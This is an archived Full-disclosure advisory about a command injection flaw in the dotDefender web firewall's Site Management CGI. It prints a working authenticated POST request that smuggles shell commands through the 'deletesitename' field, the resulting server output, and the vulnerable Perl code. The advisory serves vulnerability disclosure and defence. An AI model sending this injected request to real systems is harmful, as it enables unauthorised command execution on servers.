[Full-disclosure] Remote Command Execution in dotDefender Site Management

Les derniers commentaires publiés sur SecuObs (1-5):

- ESRT @ChrisJohnRiley @carnal0wnage - Exploiting hard filtered SQL Injections - Malicious Code Evolution from IE Zero-Day Exploit Code - Google Releases Skipfish Application Security Scanner - ESRT @securityninja - Burp Suite Tutorial - Repeater and Comparer Tool - ESRT @dinodaizovi - New metasploit blog post - analyzes the first public Perm Les derniers commentaires publiés sur SecuObs (6-25) Tous les commentaires publiés sur SecuObs avant les 5 derniers

[Message Precedent sur la mailing][Message Suivant sur la mailing][Precedent dans le fil][Prochain dans le fil][Index par Date][Index par fil] [Full-disclosure] Remote Command Execution in dotDefender Site Management

Problem Description =================== A remote command execution vulnerability exists in the dotDefender (3.8-5) Site Management.

dotDefender [1] is a web appliaction firewall (WAF) which 'prevents hackers from attacking your website.' Technical Details ================= The Site Management application of dotDefender is reachable as a web application (https:site/dotDefender/) on the webserver. After passing the Basic Auth login you can create/delete applications.

The mentioned vulnerability is in the 'deletesite' implementation and the 'deletesitename' variable.

Insufficient input validation allows an attacker to inject arbitrary commands.

Delete Site =========== A normal delete transaction looks as follow: POST /dotDefender/index.cgi HTTP/1.1 Host: 172.16.159.132 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: link://[click] Authorization: Basic YWRtaW46 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 76 sitename=dotdefeater&deletesitename=dotdefeater&action=deletesite&linenum=14 An attack looks like: --------------------/Request/-------------------- POST /dotDefender/index.cgi HTTP/1.1 Host: 172.16.159.132 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: link://[click] Authorization: Basic YWRtaW46 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 95 sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al ../;pwd;&action=deletesite&linenum=15 --------------------/Response/-------------------- [...] <br> uid=33(www-data) gid=33(www-data) groups=33(www-data) total 12 drwxr-xr-x 3 root root 4096 Nov 23 02:37 .

drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..

drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin /usr/local/APPCure-full/lib/admin uid=33(www-data) gid=33(www-data) groups=33(www-data) total 12 drwxr-xr-x 3 root root 4096 Nov 23 02:37 .

drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..

drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin /usr/local/APPCure-full/lib/admin uid=33(www-data) gid=33(www-data) groups=33(www-data) total 12 drwxr-xr-x 3 root root 4096 Nov 23 02:37 .

drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..

drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin /usr/local/APPCure-full/lib/admin uid=33(www-data) gid=33(www-data) groups=33(www-data) total 12 drwxr-xr-x 3 root root 4096 Nov 23 02:37 .

drwxr-xr-x 9 root root 4096 Nov 23 02:37 ..

drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin /usr/local/APPCure-full/lib/admin [...] Affected Code ============= The affected code (perl) is in index1.cgi of the admin interface: 311 312 }elsif($action eq "deletesite") { # delete site 313 $deletesitename=$postFields{"deletesitename"}; 314 $dots_index = index($deletesitename,"%3A"); 315 316 if($dots_index != -1 ) { 317 $site_a_part= substr($deletesitename,0,$dots_index); 318 $site_b_part= substr($deletesitename,$dots_index+3,length($deletesitename)-$dots_index-2); 319 $site_a_part=&cleanIt($site_a_part); 320 $site_b_part=&cleanIt($site_b_part); 321 $deletesitename = $site_a_part.":".$site_b_part; 322 } 323 324 $linenum=$postFields{'linenum'}; 325 applyDbAudit($action); 326 &delline($linenum,2); 327 cleanSiteFingerPrints($deletesitename); 328 329 &deleteSiteConf($deletesitename); 330 $site_params="$CTMP_DIR/".$deletesitename."_params"; 331 system("rm -f $site_params"); And applicure-lib2.pl: 13 sub cleanIt { 14 my($param,$type)=@_; 15 16 $param =~ s/%([a-fA-F0-9]{2})/pack "H2", $1/eg; 17 if ($type eq 'any') { 18 } elsif ($type eq 'filter') { 19 $param =~ s/\+/" "/eg; 20 } elsif ($type eq 'path') { 21 $param = un_urlize($param); 22 #$param =~ s/([^A-Za-z0-9\-_.\/~'])//g; 23 #$param =~ s/\+/" "/eg; 24 } else { 25 $param =~ s/([^A-Za-z0-9\-_.~'])//g; 26 } 27 return $param; 28 } Here one can see that certain shell control characters are not protected by the call to cleanIt. Thus an attacker can gain control of the system call in line 331 of index1.cgi.

References =========== [1] link://[click] Full-Disclosure - We believe in it.

Charter: link://[click] Hosted and sponsored by Secunia - link://[click]

Precedent par Date: Re: [Full-disclosure] The Cyber War Conspiracy
Suivant par Date: [Full-disclosure] [ MDVSA-2009:307 ] libtool
Precedent par fil : Re: [Full-disclosure] TLS / SSLv3 vulnerability explained (New ways to leverage the vulnerability)
Suivant par fil : [Full-disclosure] [ MDVSA-2009:307 ] libtool
Index(s):
- Date
- Fil

Archives de la liste de diffusion Secunia
Archives de la liste de diffusion BugTraq
Archives de la liste de diffusion DailyDave
Archives de la liste de diffusion FunSec
Archives de la liste de diffusion Full Disclosure
Archives de la liste de diffusion Focus-IDS (FD)
Archives de la liste de diffusion Webappsec (FD)
Archives de la liste de diffusion Security-basics (FD)
Archives de la liste de diffusion Vulndiscuss
Archives de la liste de diffusion Vulnwatch

Les derniers commentaires publiés sur SecuObs (6-25):

- ESRT @iagox86 @hdmoore - Using Metasploit to Locate and Exploit the Energizer - ESRT @innismir - New Weblog Post -- Finding Malware on your network via cache - Sniffing with Wireshark as a Non-Root User - Focus on MacNikto v1.1.1 - New Google Chrome v4.1.249.1036 released, fixes multiple security vulnerabili - ESRT @opexxx @synopsi - Remote stack overflows - ESRT @postmodern_mod3 @tmm1 - memprof now displays stack frames and threads - ESRT @_MDL_ @gollmann - Locking botnet agents to specific victim systems in o - CsFire 0.4.1 autonomously protects against dangerous or malicious cross-domai - Seccubus v1.4.1 - Nessus 4.2 compatibility release - ESRT @JGamblin @threatpost - Hackers say they will definitely break into an A - ESRT @hdmoore @iagox86 - Weaponizing dnscat - first version of dnscat shellco - iWep PRO 1.1.3 Released - FireCAT v1.6.2 updated with Framework Detector - ESRT @opexxx - FireCAT v1.6.2 updated with BackendInfo - sipwitch 0.7.4 - Oracle XDB FTP service UNLOCK buffer overflow exploit that spawns a reverse s - XSSploit XSS scanner multiplatfom v0.5 available - Network forensics in IRB xtractr Ruby gem - GreenPois0n Possible Jailbreak Software for iPad OS 32 Les cinq derniers commentaires publiés sur SecuObs Tous les commentaires publiés sur SecuObs avant les 25 derniers

SecuToolBox :

Bluetooth Stack Smasher v0.6 / Bluetooth Stack Smasher v0.8 / Slides Bluetooth Eurosec 2006 / Exposé vidéo Windows Shellcode - Kostya Kortchinsky / Exposé audio Reverse Engineering - Nicolas Brulez / Exposé vidéo Securitech - Pierre Betouin / WEP aircrack + Ubiquiti (MadWifi) 300 mW + Yagi / Secure WIFI WPA + EAP-TLS + Freeradius / Audit Windows / Captive Password Windows / USBDumper / USBDumper 2 / Hacking Hardware / WishMaster backdoor / DNS Auditing Tool / Ettercap SSL MITM / Exploit vulnérabilités Windows / Memory Dumper Kernel Hardening / Reverse Engineering / Scapy / SecUbuLIVE CD / Metasploit / eEye Blink Sec Center / eEye Retina Scanner + d'outils / + de tutoriels

Mini-Tagwall des articles publiés sur SecuObs :

sécurité, exploit, windows, microsoft, réseau, attaque, outil, vulnérabilité, audit, système, virus, internet, données, présentation, metasploit, linux, bluetooth, protocol, vista, scanner, réseaux, shell, engineering, rootkit, paquet, conférence, trames, wishmaster, téléphone, source, sysun, noyau, mobile, https, mémoire, rapport, botnet, téléphones, libre, reverse, navigateur, patch, snort, scapy, intel + de mots clés avec l'annuaire des articles publiés sur SecuObs

Archives Failles Secunia :

- SA38989 Fedora update for tar - SA38988 Fedora update for cpio - SA38921 SUSE update for OpenOffice_org - SA38971 Multi Auktions Komplett System id_auk SQL Injection Vulnerability - SA38945 Ubuntu update for audiofile + d'archives failles avec Secunia et SecuMail

Archives Mailing Full Disclosure :

- Full-disclosure Claude Mercier/CLSC-CHSLD BVLV/Reg03/SSSS est absent(e). - Re: Full-disclosure Fingerprinting Paper with Laser - Full-disclosure Vulnerability Httpdx v1.5.3b - Full-disclosure CA20100318-01: Security Notice for CA ARCserve Backup - Re: Full-disclosure Fingerprinting Paper with Laser + d'archives Full Disclosure avec SecuMail

Archives Mailing Bugtraq :

- announcing skipfish, an automated web app security scanner - Vulnerability Httpdx v1.5.3b - IBM Lotus 6.x HTTP Response Splitting Vulnerability - There are lost of xss vul in PHPWind v6.0 ! - CA20100318-01: Security Notice for CA ARCserve Backup - SECURITY DSA-2018-1 New php5 packages fix null pointer dereference + d'archives Bugtraq avec SecuMail

Mini-Tagwall de l'annuaire video :

vmware, security, virus, biometric, windows, lockpicking, password, botnet, metasploit, tutorial, attack, crypt, linux, network, iphone, server, exploit, wimax, conficker, virtu, virtual, engineering, cisco, reverse, shmoocon, wireshark, ettercap, hacker, firewall, internet, knoppix, rootkit, arduino, wireless, source, conference, backtrack, openbsd, brucon, systm, overflow, openssh, access, buffer, remote + de mots clés avec l'annuaire des videos

Mini-Tagwall des articles de la revue de presse :

security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone, server, inject, patch, apple, twitter, mobile, virus, ebook, facebook, vulnérabilité, crypt, source, linux, password, intel, research, virtual, phish, access, tutorial, trojan, social, privacy, firefox, adobe, overflow, office, cisco, conficker, botnet, pirate, sécurité + de mots clés avec l'annuaire de la revue de presse

Mini-Tagwall des Tweets de la revue Twitter :

security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall, network, twitter, vmware, windows, microsoft, compliance, vulnerability, python, engineering, source, kernel, crypt, social, overflow, nessus, crack, hacker, virus, iphone, patch, virtual, javascript, malware, conficker, pentest, research, email, password, adobe, apache, proxy, backtrack + de mots clés avec l'annuaire de la revue Twitter